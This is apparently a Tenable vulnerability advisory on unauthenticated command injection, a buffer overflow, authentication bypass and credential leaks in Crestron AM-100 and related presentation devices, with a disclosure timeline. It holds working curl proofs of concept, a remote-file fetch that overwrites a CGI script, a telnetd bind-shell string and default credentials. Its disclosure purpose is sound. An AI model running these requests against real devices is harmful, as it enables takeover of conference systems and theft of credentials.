Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

OEM Presentation Platform Vulnerabilities

Critical

Synopsis

Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others. The vulnerabilities listed below do not affect all devices. Tenable has done its best to specifically call out which platforms are affected by each vulnerability.

CVE-2019-3925: SNMP Command Injection #1

A remote, unauthenticated attacker can inject operating system commands on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.9.3 OID. The command injection is the result of shelling out to /bin/ftpfw.sh.

CVE-2019-3926: SNMP Command Injection #2

A remote, unauthenticated attacker can inject operating system commands on theCrestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.14.1 OID. The command injection is the result of shelling out to /bin/getRemoteURL.sh.

CVE-2019-3927: Unauthenticated Admin Password Change via SNMP

A remote, unauthenticated attacker can change the admin and moderator passwords for the web interface on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.8.1 and iso.3.6.1.4.1.3212.100.3.2.8.2 OIDs. The following proof of concept shows the user logging in with the default "admin" password and then with the a new password.

CVE-2019-3928: Presentation Code Leak via SNMP

A remote, unauthenticated attacker can acquire the presentation code on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.7.4. The code allows the attacker to view locked presentations or become a presenter.

CVE-2019-3929: Unauthenticated Remote Command Injection via HTTP

A remote, unauthenticated attacker can execute operating system commands as root via crafted requests to the HTTP endpoint file_transfer.cgi. This vulnerability appears to affect all known devices including the Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000 firmware 2.3.0.10, Barco wePresent WiPG-1600 before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7

CVE-2019-3930: Unauthenticated Remote Stack Buffer Overflow via HTTP

The function PARSERtoCHAR in libAwCgi.so is called by the HTTP cgi scripts in multiple contexts. Sometimes without authentication (file_transfer.cgi) and sometimes with authentication (return.cgi). CGI scripts that pass this function input that exceeds 0x100 bytes overflow a stack buffer. The following proof of concept shows a remote, unauthenticated attacker triggering this bug.

curl -v --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaPa_NoteaaaaaaaaaaaaaaPa_Noteaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi

Which generates the following back trace:

Core was generated by `/home/boa/cgi-bin/file_transfer.cgi'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x61616160 in ?? ()
(gdb) bt
#0  0x61616160 in ?? ()
#1  0x4003ffc4 in replace () from /lib/libAwCgi.so
#2  0x61616160 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb)

This vulnerability appears to affect all known devices including the Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000 firmware 2.3.0.10, Barco wePresent WiPG-1600 before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7.

CVE-2019-3931: Authenticated Remote File Upload via HTTP

The Crestron AM-100 1.6.0.2 and AM-101 2.7.0.1 received a patch to fix CVE-2017-16709. The patch attempted to filter out operating system commands to prevent command injection. However, this patch was not entirely successful and authenticated attackers can still provide arbitrary parameters to curl. This allows authenticated attackers to upload any file to the device. Furthermore, the /home/boa/cgi-bin/ directory is writeable which allows the attacker to easily achieve code execution.

The following proof of concept:

curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "command=<Send><seid>fAEI0CHTDTHKcDVD</seid><upload><protocol>ftp</protocol><address>http://192.168.88.248:1270Pa_Note http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi</address><port>1270</port><account>lol</account><password>lol</password><logo>/tmp/wat</logo></upload></Send>" \
--insecure https://192.168.88.250/cgi-bin/return.cgi

Will cause the following command to be executed on the device:

sh /usr/bin/curl -k -o /tmp/Example.ogg http://192.168.88.248:1270; http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi

Where lol.cgi is the file to upload and file_transfer.cgi is the file to overwrite

CVE-2019-3932: Authentication Bypass in return.tgi

The return.tgi script in /home/boa/tgi/ allows remote attackers to bypass authentication with a hardcoded sessionID of trLVy9Gh82KDHoy on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The return.tgi controls external devices via the uart_bridge. A sample bypass follows:

curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "command=session&trLVy9Gh82KDHoy9&beef100500    2222010005"
--insecure https://192.168.88.250/tgi/return.tgi

CVE-2019-3933: Remote View Login Bypass #1

An unauthenticated, remote attacker can bypass the remote view "login" (pictured in CVE-2019-3928) simply by navigating to http://[ip address]/images/browserslide.jpg. The final image of a screenshare will also be cached at that location even after the presentation has finished. If a presentation has not occurred since a reboot then this page will be a 404. This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.

CVE-2019-3934: Remove View Login Bypass #2

An unauthenticated, remote attacker can bypass the remote view "login" (pictured in CVE-2019-3928) and down slide images by executing the following HTTP request:

curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "BROWSER=client" \
--insecure "https://192.168.88.250/cgi-bin/login.cgi?lang=en&src=lol.html" > slideshow_img.jpg

This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1

CVE-2019-3935: Unauthenticated Remote Moderator Controls

An unauthenticated, remote attacker can stop, start, and disconnect any screen sharing session due to insufficient authentication checking in the moderator controls. The following commands demonstrate this functionality in the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1. Note that the first request provides the attacker with the "primary key" for the screen share session.

[email protected]:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "conference" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
3000192.168.88.24741
[email protected]:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=Stop" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success
[email protected]:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=PlayImage" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success
[email protected]:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=Disconnect" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success

CVE-2019-3936: Unauthenticated Remote View Denial of Service

An unauthenticated, remote attacker can stop a screen share by sending the string wppcmd\x00\x00\xa0\x00\x00\x00 to TCP port 389. The request takes about 2 minutes to go through, but after that time period the screen share transitions into the "Stopped" state.

CVE-2019-3937: Credentials Stored in Plaintext

The file /tmp/scfgdndf stores usernames, passwords, and more in plaintext. Maybe under normal circumstances this wouldn't be too concerning, but with multiple unauthenticated vulnerabilities affecting the devices, including a file inclusion vulnerability, this becomes more concerning. The following is a sample of the files contents. Note that "modpass" and "adminpass" were the passwords in use at the time of dumping this file.

  /tmp # strings /tmp/scfgdndf
  WPS820 100111101110001
  Crestron AirMedia
  WiPG1K5s
  8888
  #FFFFFF
  AirMedia-0e58c9
  default
  AM-100
  user
  trainer
  admin
  sh -b 0.0.0.0:1270
  private
  user
  authpass
  privpass
  public
  GMT-8_CH
  0.0.0.0
  modpass
  adminpass
  http://192.168.88.253:1270;telnetd -l /bin/sh -b 0.0.0.0:1270

This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.

CVE-2019-3938: Exported Credentials Recoverable

The platform allows the administrator to export and import configuration files. The device stores user credentials in the configuration file. The configuration file is easily decoded using the vendor's awenc tool. After decoding, the admin password is revealed ("lolwat" in the PoC below). This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.

[email protected]:~$ sudo chroot . ./qemu-arm-static /bin/awenc -h
Encode / Decode files with awenc
Usage: awenc [OPTION]
  -i; --input [FILENAME]:   Input file
  -o; --output [FILENAME]:  Output file
  -d; --decode:             Do Decode 
  -e; --encode:             Do Encode 
  -g; --get:                Get Header 
  -h; --help:               Print this message 
[email protected]:~$ sudo chroot . ./qemu-arm-static /bin/awenc -d -i ./System.conf -o ./out
AWENC [0:29:38.124] -- AWDEC: file operation start
AWENC [0:29:38.127] -- finish check original head.
AWENC [0:29:38.128] -- Start Enc / Dec
AWENC [0:29:38.129] -- FILE_OPERATION END
AWENC [0:29:38.129] -- finish check restored head.
AWENC [0:29:38.129] -- AW_DEC: finish create file.
[email protected]:~$ cat out | grep PWD
<?xml version="1.0" encoding="utf-8"?><awapi web_index="WEB_DOWNLOAD_PWD"
value="" /><awapi web_index="WEB_TRAINER_PWD" value="" /><awapi
web_index="WEB_ADMIN_PWD" value="" /><awapi web_index="PREF_LOGINCODE"
value="0" /><awapi web_index="LONG_TRAINER_PWD" value="moderator" /><awapi
web_index="LONG_ADMIN_PWD" value="lolwat" /><awapi

CVE-2019-3939: Default Credentials

The devices use the default credentials "admin:admin" for the admin user and "moderator:moderator" for the moderator user.

CVE-2017-16709: Authenticated Command Injection

In June 2018, Crestron patched an authenticated, remote command injection vulnerability which was assigned CVE-2017-16709. Through patch analysis, Tenable believes this vulnerability is a command injection via HTTP. Analysis of the other devices indicated they had not patched this vulnerability.

Solution

At the time of publication, Barco has released firmware updates for their WiPG-1000P and WiPG-1600W systems. Extron has also published a firmware update. Finally, Crestron has released an advisory on their Security Advisory page.

We are not aware of any other patches at this time.

Contact your vendor for further information. As a general mitigation technique, never expose your IoT device to the internet and host IoT devices on their own network whenever possible.

Disclosure Timeline

01/15/2019 - Tenable contacts InFocus support and asks for a security contact.
01/15/2019 - InFocus indicates support is the correct point of contact.
01/15/2019 - Tenable contacts Teq AVIT support and asks for a security contact.
01/15/2019 - Tenable receives an automated response from Teq AVIT.
01/15/2019 - Tenable extracts [email protected] from Crestron's reporting PDF. Asks Crestron contact if that is correct.
01/15/2019 - Crestron confirms.
01/16/2019 - Tenable discloses to Crestron, Barco, InFocus, and Teq AVIT via email. Tenable attempts to disclose to Extron via their web reporting mechanism but that failed... awaiting instructions from Extron. Coordinated disclosure for all companies is
01/16/2019 - Automated acknowledgement received from InFocus.
01/16/2019 - Extron representative contacts Tenable and asks if we need technical help with their products.
01/16/2019 - Tenable replies to Extron that we'd like to report security issues in one of their products.
01/16/2019 - Extron says an engineer will reach out to Tenable.
01/16/2019 - InFocus acknowledges receipt and forwards to development.
01/17/2019 - Tenable receives undeliverable messages for Crestron's stated disclosure email address.
01/17/2019 - Tenable discloses to a known Crestron contact.
01/17/2019 - Barco PSIRT acknowledges receipt. Forwarded to engineering.
01/23/2019 - Tenable reminds Extron that an engineer is supposed to contact them.
01/23/2019 - Tenable asks Teq AVIT to acknowledge the disclosure.
01/25/2019 - Infocus acknowledges the vulns and indicates they will fix them when resources become available.
01/25/2019 - Tenable acknowledges Infocus and reminds them of the April 17th deadline.
01/31/2019 - Tenable asks Crestron to acknowledge the disclosure.
02/03/2019 - Crestron indicates the vulnerabilities were passed to the OEM.
02/04/2019 - Tenable asks Crestron if the OEM is Barco? Tenable also asks about some differences in patch levels they'd noticed.
02/21/2019 - Crestron says 8 of the vulnerabilities are "already known and have fixes coming"
02/21/2019 - Tenable asks if they are publicly known or internally known.
02/22/2019 - Crestron says internally.
02/26/2019 - Tenable indicates their discovery is considered "independent discovery" and that their disclosure policy will still apply.
02/26/2019 - Crestron agrees.
02/27/2019 - InFocus provides Tenable fixes to look at.
02/27/2019 - Tenable indicates to InFocus that these fixes are incorrect.
02/27/2019 - InFocus says they will go back to the devs.
03/07/2019 - Barco release 2.3.1.16 for the WiPG-1000.
03/07/2019 - Tenable tells Barco they should have waited for the April 17th coordination date.
03/07/2019 - Barco indicates this worked best for their release policy.
03/15/2019 - Crestron asks about communication with other vendors and concerns about OEM delivery.
03/15/2019 - Tenable indicates they've been in contact with a few vendors and that Barco has already released a patch.
03/19/2019 - Tenable reminds Extron that we are still waiting on an engineer to contact us.
03/19/2019 - Tenable again asks Teq AV IT to acknowledge the disclosure.
03/19/2019 - Extron attempts to call Tenable.
03/19/2019 - Tenable indicates written communication is the preferred medium. Tenable reiterates that they want to disclose vulnerabilities.
03/19/2019 - Extron says to forward information to them.
03/19/2019 - Tenable discloses to Extron.
03/19/2019 - Extron acknowledges.
03/26/2019 - Tenable asks Barco about issues Crestron reported with the OEM.
03/26/2019 - Tenable asks Crestron if they've had any follow up from the OEM.
03/26/2019 - Crestron says yes and they expect patches by April 5.
03/26/2019 - Tenable thanks Crestron.
03/29/2019 - Extron asks if Tenable is in contact with the OEM. Also, indicates that they won't have patches until May 20.
03/29/2019 - Tenable acknowledges that they've been in communication with the OEM since January 16. Tenable also indicates that May 20th is outside the 90 day disclosure window.
03/29/2019 - Tenable asks Barco to verify a list of OEM partners.
03/29/2019 - Extron asks if they can quote Tenable in communication to OEM.
03/30/2019 - Tenable says that is fine.
04/01/2019 - Barco says they are working to identify all affected ODM partners. Asks Tenable for a full list of vulns.
04/01/2019 - Tenable indicates Barco should have a full list already.
04/02/2019 - Tenable again asks Barco about their OEM partners and who they are in contact with. Tenable also informs Barco of the assigned CVE.
04/03/2019 - Tenable provides 2 week notice and CVE assignment to Crestron, Infocus, and Extron.
04/03/2019 - Extron indicates they need until April 30th to release patches.
04/03/2019 - Tenable points out the 2 week grace period in their disclosure policy.
04/03/2019 - Extron confirms patches will be released on April 30th. Ask Tenable about CVE assignment.
04/04/2019 - Tenable acknowledges April 30th as the new coordinated disclosure date. Tenable also explains the odd circumstances around CVE-2017-16709.
04/04/2019 - Tenable informs Barco, InFocus, and Crestron of the new disclosure date due to Extron invoking the 2 week grace period.
04/04/2019 - InFocus acknowledges new date.
04/04/2019 - Barco says they will get back to Tenable on OEM question by next Monday.
04/08/2019 - Barco states, "We can only provide information for Barco products and cannot provide any information about ODM partners as this is company restricted information."
04/08/2019 - Tenable acknowledges the limitation in communication and indicates they will reach out to company SHARP, Blackbox, and Optoma to ensure they have an opportunity to work with Barco.
04/08/2019 - Tenable informs SHARP via webform. Tenable couldn't find any other contact method.
04/08/2019 - Tenable informs Blackbox via email.
04/08/2019 - Black box assigns reference 52085.
04/08/2019 - Tenable informs Optoma via webform. Tenable couldn't find any other contact method.
04/08/2019 - Optoma assigns case ID 00331523
04/08/2019 - Tenable receives an undeliverable mail notification from SHARP... Tenable notes we filled out a webform.
04/08/2019 - Optoma states, "The WPS-Pro is not made by Barco"
04/08/2019 - Black box states, "the last firmware version we had from Awind was 1.0.0.5" and also notes that they no longer offer the product.
04/24/2019 - Tenable reminds Crestron, Barco, InFocus, and Extron of impending publication.
04/24/2019 - Extron acknowledges Tenable's reminder and indicates they'll be ready.
04/25/2019 - Crestron acknowledges Tenable's reminder and indicates they might not make the patch date.
04/29/2019 - Barco informs release of improved patches in the WiPG-1000P and WiPG-1600W.
04/29/2019 - Tenable thanks Barco.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,190.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.